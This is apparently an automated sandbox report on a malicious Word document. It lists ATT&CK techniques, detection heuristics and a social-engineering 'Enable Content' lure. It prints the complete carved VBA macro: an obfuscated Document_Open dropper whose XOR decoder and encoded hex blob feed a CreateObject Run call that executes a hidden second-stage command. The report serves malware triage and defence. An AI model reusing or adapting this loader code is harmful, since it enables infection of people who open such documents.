MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a Word document containing a "Document_Open" VBA macro that is heavily obfuscated. The macro uses CreateObject to execute a second-stage payload, indicated by the "Obfuscated auto-exec VBA loader" heuristic. The document body explicitly instructs the user to "Enable Editing" and "Enable Content", a common social engineering lure for macro-enabled documents.
Heuristics 8
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1347 bytes |
SHA-256: 0a12aa51b84a736064484ac477838094c0295d34eefd88984d28f8ba80f2c825 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub DocUmenT_OPEN()
JCtC
End Sub
Private Function Fh(Ieu3p, J8s, Jm, Ah4K)
Dim H0O
For H0O = 1 To Ah4K
Fh = Fh + FKhWg(Val(FKhWg((-7334 + 7372)) & FKhWg((207792 / 2886)) & (Mid$(J8s, (2 * H0O) - 1, 2))) Xor NZSy(Mid$(Ieu3p, (H0O - (Jm * (H0O \ Jm)) + 1), 1)))
Next H0O
End Function
Private Function FKhWg(AgOSir) As String
Dim CG(1) As Byte
CG(0) = AgOSir
FKhWg = CG
End Function
Private Sub JCtC()
Dim WosfMH
WosfMH = "162C36601039376E5A1772613661212B0161701F022C287350131300310E1F6B5761746855233B3A062036231C2F7261013333200627373C5512063E556E3621022F3E211425726105333B210728263755293B291D617026013522745A6E6B7A5B70627C5B776160426E213B1728367F5B242A2B5761706B3411020A3415136B29600339183B7360012C226C5567746E2615131C2161726C5761706B3411020A3415136B29600339183B7360012C226C"
CreateObject(Fh("CW", "003034313E33236D042B322F3B", 2, 13)).Run Fh("NuAR", WosfMH, 4, 176), (3556 - 3556), (3833 - 3833)
End Sub
Private Function NZSy(EgWbE)
Dim GcHUP() As Byte
GcHUP = EgWbE
NZSy = GcHUP(0) + (GcHUP(1) * (1699584 / 6639))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.